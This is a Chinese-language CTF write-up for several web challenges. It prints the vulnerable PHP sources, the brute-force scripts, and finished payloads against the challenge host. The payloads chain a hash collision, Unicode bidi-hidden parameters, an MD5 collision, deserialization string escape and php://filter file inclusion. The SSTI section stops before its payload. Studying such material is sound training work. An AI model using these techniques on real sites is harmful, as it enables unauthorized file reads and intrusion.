# Web

# 羊了个羊

image-20230501130234361

网址前加上 view-source: 查看源码

image-20230501130347598

解码得到 flag

image-20230501130419360

# 小周的密码锁

页面上一个参数

image-20230523161457189

隐藏了一个参数(password2),这里在前端写死了

image-20230523161447232

尝试修改值,到 5 的时候看见了源码

image-20230523161549377

<?php
    // Polynomial rolling hash over the bytes of $str: h = h * 40 + ord(byte),
    // each step wrapped in intval40(), result returned through abs().
    // NOTE: $h is initialised but never used; the loop accumulates into $hash,
    // which is never initialised. With error_reporting(0) the first
    // `40 * $hash` silently evaluates null as 0, so it behaves as if $hash = 0.
    // Because the multiplier (40) is smaller than the byte range (256) the
    // function is far from injective: raising one byte by 1 and lowering the
    // next by 40 leaves the hash unchanged, which is why the writeup can
    // replace "ISCC" with "K\x00\xB8\xBB" and still pass the comparison below.
    function MyHashCode($str)
    {
        $h = 0;
        $len = strlen($str);
        for ($i = 0; $i < $len; $i++) {
            $hash = intval40(intval40(40 * $hash) + ord($str[$i]));
        }
        return abs($hash);
    }
    
    // Looks like a "sign-fix" for a 40-bit value, but for any PHP int it is the
    // identity: when `$code >> 32 == 1` (bit 32 set, nothing higher),
    // ~($code - 1) equals -$code and multiplying by -1 gives $code back; every
    // other value is returned untouched. (Behaviour for a float $code, e.g.
    // after integer overflow, goes through float->int truncation — not relied
    // on here.) $falg is a typo for $flag.
    function intval40($code)
    {
        $falg = $code >> 32;
        if ($falg == 1) {
            $code = ~($code - 1);
            return $code * -1;
        } else {
            return $code;
        }
    }
    // Denylist: the password may not contain the substring "ISCC" anywhere.
    // Combined with the MyHashcode comparison below this rules out the real
    // password "ISCCNOTHARD" itself and forces a hash collision instead.
    function Checked($str){
        $p1 = '/ISCC/';
        if (preg_match($p1, $str)){
            return false;
        }
        return true;
    }
    // Derives $crypto from two GET parameters and normalises $user.
    // Preconditions: $sha1 must be lowercase letters only (/^[a-z]+$/) and
    // $sha2 uppercase letters only (/^[A-Z]+$/); anything else dies("wrong").
    // The cases are then swapped and the strings XORed byte-wise (PHP's
    // string ^ string truncates to the shorter operand), so every byte of
    // $crypto is (upper letter) ^ (lower letter), i.e. in the range 0x20-0x3F.
    // $user is uppercased, which leaves digit-only usernames unchanged.
    // Returns [$crypto, $user].
    function SecurityCheck($sha1,$sha2,$user){
        
        $p1 = '/^[a-z]+$/';
        $p2 = '/^[A-Z]+$/';
        if (preg_match($p1, $sha1) && preg_match($p2, $sha2)){
            $sha1 = strtoupper($sha1);
            $sha2 = strtolower($sha2);
            $user = strtoupper($user);
            $crypto = $sha1 ^ $sha2;
        }
        else{
            die("wrong");
        }       
        return array($crypto, $user);
    }
    error_reporting(0);
    
    $user = $_GET['username'];//user
    $sha1 = $_GET['sha1'];//sha1
    // Not the key "sha2": the array key below is wrapped in Unicode bidi
    // controls (U+202E RLO, U+2066 LRI, "//sha2", U+2069 PDI, U+2066 LRI,
    // "sha2") so that it *renders* as `$_GET['sha2']; //sha2`. The real key is
    // "\u{202E}\u{2066}//sha2\u{2069}\u{2066}sha2" and must be sent URL-encoded
    // as %E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2.
    $sha2 = $_GET['‮⁦//sha2⁩⁦sha2'];
    //‮⁦see me ⁩⁦can you 
    if (isset ($_GET['password'])) {
        // password2=5 is the source disclosure used to obtain this listing.
        if ($_GET['password2'] == 5){
            show_source(__FILE__);
        }
        else{
            //Try to encrypt
            if(isset($sha1) && isset($sha2) && isset($user)){
                [$crypto, $user] = SecurityCheck($sha1,$sha2,$user);
                // Gate 1: last 6 hex digits of sha1($crypto) and sha1($user)
                // must both equal 'a05c53'.
                if((substr(sha1($crypto),-6,6) === substr(sha1($user),-6,6)) && (substr(sha1($user),-6,6)) === 'a05c53'){//welcome to ISCC
                    
                    // Gate 2: MyHashcode (function names are case-insensitive
                    // in PHP, so this is MyHashCode above) of the password must
                    // equal that of "ISCCNOTHARD", yet Checked() forbids the
                    // substring "ISCC" — only a hash collision satisfies both.
                    if((MyHashcode("ISCCNOTHARD") === MyHashcode($_GET['password']))&&Checked($_GET['password'])){
                        include("f1ag.php");
                        echo $flag;
                    }else{
                        die("就快解开了!");
                    }
                    
                }
                else{
                    die("真的想不起来密码了吗?");
                }
            }else{
                die("密钥错误!");
            }
        }    
    }        
    // Runs after every branch above has finished; it influences none of the
    // checks in this file.
    mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 1e4) + rand(1, 1e4));
?>

这里的参数名里夹着 Unicode 标准定义的双向控制字符(U+202E RLO、U+2066 LRI、U+2069 PDI),使得 `//sha2` 在编辑器里看起来像注释。真正的键名是 `\u202E\u2066//sha2\u2069\u2066sha2`,URL 编码后以 `%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=...` 传入即可(与最后的 payload 一致)

image-20230523162310303

这里要求 sha1 只含小写字母、sha2 只含大写字母,随后把 sha1 转大写、sha2 转小写再按字节异或得到 crypto。先把大小写字母两两异或的所有可能列出来

<?php
// Print the XOR of every lowercase/uppercase letter pair, one per line in the
// form "aA=====<byte>". The server builds $crypto as
// strtoupper($sha1) ^ strtolower($sha2) byte by byte, so this table is exactly
// the set of bytes a crypto string can contain.
$str1 = 'abcdefghijklmnopqrstuvwxyz';
$str2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
foreach (str_split($str1) as $lower) {
    foreach (str_split($str2) as $upper) {
        printf("%s%s=====%s\n", $lower, $upper, $lower ^ $upper);
    }
}

image-20230523165640284

这里能用的字符:小写字母与大写字母异或,结果一定落在 0x20–0x3F,即空格和 !"#$%&'()*+,-./0123456789:;<=>? 这 32 个字符(正是上面脚本输出的集合)。用这些字符随机拼串爆破,找一个 sha1 后 6 位满足题目要求的

<?php
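// Alphabet of bytes that strtoupper($sha1) ^ strtolower($sha2) can produce.
// Derived from the XOR itself rather than typed by hand: the original literal
// was single-quoted, so its `\"` stayed as backslash + quote and a stray `\`
// (not producible by the XOR) leaked into the search alphabet.
$string = '';
foreach (str_split('abcdefghijklmnopqrstuvwxyz') as $lower) {
    foreach (str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ') as $upper) {
        $string .= $lower ^ $upper;
    }
}
$string = count_chars($string, 3); // unique bytes only (0x20..0x3F)
$targetHash = 'a05c53';
// Random search; every hit is printed so the shortest can be picked later.
// mt_rand is fine here — this is a search, not a secret.
for ($i = 0; $i < 999999999999999; $i++) {
    // At least one byte: the server's /^[a-z]+$/ and /^[A-Z]+$/ reject empty
    // sha1/sha2, so an empty crypto can never be produced anyway.
    $length = mt_rand(1, 9);
    $randomString = '';
    for ($j = 0; $j < $length; $j++) {
        $randomString .= $string[mt_rand(0, strlen($string) - 1)];
    }
    if (substr(sha1($randomString), -6) === $targetHash) {
        echo $randomString . "\n";
    }
}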

image-20230523171014503

这里选用一个最短的 79;4",再反推对应的输入:sha1 全部用 a(服务端转大写后为 A),sha2 的每一位取 strtoupper(chr(ord('A') ^ ord(c))),例如 'A' ^ '7' = 'v' → 'V',依次得到 sha1=aaaaa&sha2=VXZUC

image-20230523162613992

这里要求 sha1($crypto) 和 sha1($user) 的后 6 位相同且都为 a05c53。username 会先被 strtoupper,所以选纯数字的 username 最省事(大小写转换不影响它)

<?php
// Enumerate integers whose sha1 hex digest ends in the required suffix and
// print each one; any single hit works as the username. Digits survive the
// server's strtoupper() unchanged, so sha1 of what we send is what it hashes.
$i = 0;
while ($i < 9999999999) {
    $digest = sha1($i);
    if (substr($digest, -6, 6) == "a05c53") {
        echo $i, "\n";
    }
    $i++;
}

image-20230523163133178

这些值都满足条件,取其一即可

image-20230523171458413

最后一个 if

image-20230523162841005

这里通过 MyHashcode 和 checked 检查 password

image-20230523171602567

image-20230523171613926

不能包含 ISCC,这里还是暴力一点,写一个脚本爆破一下

<?php
error_reporting(0); // mirror the server; also hides notices from the copied hash (e.g. the uninitialised $hash in the original MyHashCode)
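/**
 * Local copy of the server's MyHashCode(): h = h * 40 + ord(byte) over $str,
 * each step passed through intval40(), the result returned via abs().
 *
 * The server initialises an unused $h and never initialises $hash, so its
 * first iteration computes 40 * null == 0; starting from 0 here yields the
 * same values without depending on error_reporting(0) to hide the notice.
 *
 * Because 40 < 256 the hash is far from injective, and because each step only
 * depends on the previous hash and the current byte, two colliding strings
 * keep colliding when the same suffix is appended — a 4-byte collision for
 * "ISCC" followed by "NOTHARD" therefore collides with "ISCCNOTHARD".
 *
 * @param string $str bytes to hash
 * @return int|float non-negative hash (float only if the int range overflows)
 */
function MyHashCode($str)
{
    $hash = 0;
    $len = strlen($str);
    for ($i = 0; $i < $len; $i++) {
        $hash = intval40(intval40(40 * $hash) + ord($str[$i]));
    }
    return abs($hash);
}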
/**
 * Mirror of the server's intval40().
 *
 * It reads like a 40-bit sign fix but is a no-op for any PHP int: when bit 32
 * is the only high bit set (($code >> 32) == 1), ~($code - 1) is -$code and
 * negating that restores $code; every other value falls through unchanged.
 * Kept so the local hash matches the server's value for value.
 *
 * @param int $code intermediate hash value
 * @return int the same value
 */
function intval40($code)
{
    if (($code >> 32) != 1) {
        return $code;
    }
    $negated = ~($code - 1);
    return -$negated;
}
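// Brute-force a 4-byte string whose MyHashCode() equals that of "ISCC".
// Only the prefix needs to collide: the hash is prefix-linear, so
// <hit> . "NOTHARD" then collides with "ISCCNOTHARD" while Checked() (which
// rejects anything matching /ISCC/) still passes. mt_rand is fine here —
// this is a search, not a secret.
$length = 4;
$target = MyHashCode("ISCC"); // hoisted: loop-invariant
for ($j = 0; $j < 99999999; $j++) {
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= chr(mt_rand(0, 255));
    }
    // Compare raw bytes (the original urlencode()/urldecode() round trip was a
    // no-op) and skip anything the server's Checked() would reject.
    if (MyHashCode($randomString) === $target && !preg_match('/ISCC/', $randomString)) {
        // urlencode so NUL and high bytes survive in the GET query string.
        echo urlencode($randomString) . "\n";
    }
}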

image-20230523182344443

最后的 payload

http://47.94.14.162:10008/?password=K%00%B8%BBNOTHARD&username=14987637&sha1=aaaaa&%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=VXZUC

image-20230523182758546

# 老狼老狼几点了

这个题因为信息很少,只能去尝试输入不同的时间

image-20230523183128437

最后发现输入 12 会跳转到 guess_time.php

<?php
//"Hello! welcome to ISCC, wish you have a great time!";
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
echo time();
// Holds a serialized array and, on destruction, unserializes it after
// filter() has rewritten it. Stripping "base64" AFTER serialize() means the
// declared s:N: lengths no longer match the content — the classic
// serialization-injection primitive that the writeup exploits.
class what_time_is_it{
    protected $func, $target;
    public function __construct($show_time){
        $this->func = $show_time;
    }
    // Only fires if an object of this class is unserialized; the payload
    // unserialized in call_func() is an array, so this is not on the path.
    public function __wakeup(){
        echo "wakeup";
    }
    public function call_func(){
        // Untrusted: $this->func is serialize($_SESSION) built from POST data.
        $lets_show_time = unserialize($this->filter($this->func));
        if($lets_show_time['function'] == "show_time"){
            // Single-quoted: prints the literal text, date() is not evaluated.
            echo 'The time is: ". date("h:i:sa", time()). "<br>';
        }
        else if($lets_show_time['function'] == "hack"){
            file_put_contents('time.php', "<?php echo 'The time is: ". date("h:i:sa", time()). "<br>';");
            echo "做撚啊做,你还是看看时间吧";
            // Local file inclusion with a path taken from the unserialized
            // array; a php://filter wrapper turns it into an arbitrary file read.
            include($lets_show_time['file']);
        }
        else
            highlight_file(__file__);
    }
    // Case-insensitive removal of "base64" from the serialized string.
    private function filter($s){
        return preg_replace('/base64/i','', $s);
    }
    public function __destruct(){
        $this->call_func();
    }
}
// No session_start() in the visible code: $_SESSION is just an ordinary array
// here, rebuilt per request from values the client influences.
if($_SESSION) unset($_SESSION);
$p1 = $_POST['param1'];
$p2 = $_POST['param2'];
$_SESSION['function'] = isset($_GET['func']) ? $_GET['func'] : "highlight_file";
$_SESSION['file'] = 'time.php';
// Strict !== / ===: this needs a genuine MD5 collision (two different byte
// strings, same digest), not the "0e..." == type-juggling trick.
if ($p1 !== $p2 && md5($p1) === md5($p2)){
    // The colliding messages must begin with the server's current 10-digit
    // time(), so the collision has to be generated with that prefix.
    if (substr($p1, 0, 10) === strval(time())){
        echo "Just the time";
        // Variable overwrite: every POST key becomes a variable, including a
        // _SESSION[...] key that replaces the whole $_SESSION array.
        extract($_POST);
        $_SESSION['file'] = 'time.php';
        $_SESSION['function'] = "show_time";
    }
    else{
        echo "Sorry wrong time!";
    }
}
// The serialized (attacker-shaped) array plus "<br>" is what __destruct()
// later unserializes after filter() has stripped "base64" from it.
$let_me_show_time = serialize($_SESSION)."<br>";
$a = new what_time_is_it($let_me_show_time);

先看 if

image-20230523183745040

md5 强碰撞(=== 比较,无法用 0e 弱类型绕过),且 $p1 前 10 位必须等于请求时的时间戳,所以要用 fastcoll 以当前时间戳作为前缀生成一对 MD5 碰撞。参考:使用 fastcoll 生成字符串 MD5 碰撞_KogRow 的博客 - CSDN 博客

<?php 
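/**
 * Read a whole file as raw bytes (fastcoll's output is binary).
 *
 * Uses file_get_contents instead of fopen/fread/fclose: the original passed
 * filesize() straight to fread(), which fails on an empty file (PHP 8 throws
 * a ValueError), and never checked fopen() for failure.
 *
 * @param string $path file to read
 * @return string file contents
 * @throws RuntimeException if the file cannot be read
 */
function readmyfile($path)
{
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException("cannot read $path");
    }
    return $data;
}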
system("E:\\webtools\\fastcoll_v1.0.0.5\\fastcoll_v1.0.0.5.exe ./1.txt");
$a = urlencode(readmyfile("./1_msg2.txt"));
$b = urlencode(readmyfile("./1_msg1.txt"));
unlink("./1_msg2.txt");
unlink("./1_msg1.txt");
echo "\n";
// if(md5((string)urldecode($a))===md5((string)urldecode($b))){
// echo $a."\n";
// }
// if(urldecode($a)!=urldecode($b)){
// echo $b;
// }
echo "param1=$a&param2=$b";

image-20230523185624197

image-20230523190635845

image-20230523190731282

进入这个 if 之后,$_SESSION['function'] 会被强制写成 'show_time',所以需要让最终反序列化出来的 function 不等于 'show_time' 而等于 'hack'

image-20230523191103945

这里用 extract($_POST) 接收 POST 参数,可以直接变量覆盖 $_SESSION;serialize 之后 filter() 才把 base64 删掉,使声明的字符串长度与实际内容不一致,从而实现反序列化字符串逃逸;最后通过 include 配合 php://filter 读取 flag.php

<?php 
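/**
 * Read a whole file as raw bytes (fastcoll's output is binary).
 *
 * Uses file_get_contents instead of fopen/fread/fclose: the original passed
 * filesize() straight to fread(), which fails on an empty file (PHP 8 throws
 * a ValueError), and never checked fopen() for failure.
 *
 * @param string $path file to read
 * @return string file contents
 * @throws RuntimeException if the file cannot be read
 */
function readmyfile($path)
{
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException("cannot read $path");
    }
    return $data;
}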
system("E:\\webtools\\fastcoll_v1.0.0.5\\fastcoll_v1.0.0.5.exe ./1.txt");
$a = urlencode(readmyfile("./1_msg2.txt"));
$b = urlencode(readmyfile("./1_msg1.txt"));
unlink("./1_msg2.txt");
unlink("./1_msg1.txt");
echo "\n";
// if(md5((string)urldecode($a))===md5((string)urldecode($b))){
// echo $a."\n";
// }
// if(urldecode($a)!=urldecode($b)){
// echo $b;
// }
echo "param1=$a&param2=$b&_SESSION[a]=base64base64base64&_SESSION[aaa]=;s:4:\"file\";s:62:\"php://filter/read=convert.iconv.utf-8.utf-16/resource=flag.php\";s:8:\"function\";s:4:\"hack\";s:8:\"function\";s:4:\"hack\";}";

最后的 payload

param1=1684843960%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%CA%BF%D7%60%1F6rcJ%9F%85%C7L%9CP%E6%26%B5C%E0%2F%12Z%F62Jy%F9%10%92%26%C3%93%0B%C1%E1%E8%E3%11%C1%C7%BF%BA%22%15%9E%1D%0D%8CRM%3A%7Cv%C8%FE%5E%F6P%24%DB%E4%D1L%04%0B%ED%22E%CAA%0F%E1%A3%FB%07%B1%8C%D2%8F%C6J%A9%FA%F8%F9%60U%CD%17%18%C5%5D%19%5D%B2%3B%29%DF%D6Y%B9%AD%07%85%8F%C0%AF%B0%91z%EC%DF%2C%03%AC%FCS%00b%AB%D4%23%C4S%DB%3Dg&param2=1684843960%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%CA%BF%D7%60%1F6rcJ%9F%85%C7L%9CP%E6%26%B5C%60%2F%12Z%F62Jy%F9%10%92%26%C3%93%0B%C1%E1%E8%E3%11%C1%C7%BF%BA%22%15%1E%1D%0D%8CRM%3A%7Cv%C8%FE%5E%F6P%A4%DB%E4%D1L%04%0B%ED%22E%CAA%0F%E1%A3%FB%07%B1%8C%D2%8F%C6J%A9z%F8%F9%60U%CD%17%18%C5%5D%19%5D%B2%3B%29%DF%D6Y%B9%AD%07%85%8F%C0%AF%B0%11%7B%EC%DF%2C%03%AC%FCS%00b%AB%D4%23DS%DB%3Dg&_SESSION[a]=base64base64base64&_SESSION[aaa]=;s:4:"file";s:62:"php://filter/read=convert.iconv.utf-8.utf-16/resource=flag.php";s:8:"function";s:4:"hack";s:8:"function";s:4:"hack";}

image-20230523201305959

# ChatGGG

image-20230523204412046

很有意思的一个题,很明显是模板注入(SSTI),这里过滤了不少关键字和符号,大概就是下面这些

waf:_,class,or,+,*,init,base,global,builtin,.

image-20230523205058089

这里得到提示:flag 就在 fllaaag.txt 里面,那么思路就很明显了,只要想办法绕过 waf 去读这个文件即可。关键字几乎都被过滤,这里考虑用编码把关键字拼出来绕过;点号被过滤则用模板引擎的 attr 过滤器代替属性访问

image-20230524012330774

成功了,这里开始构建 payload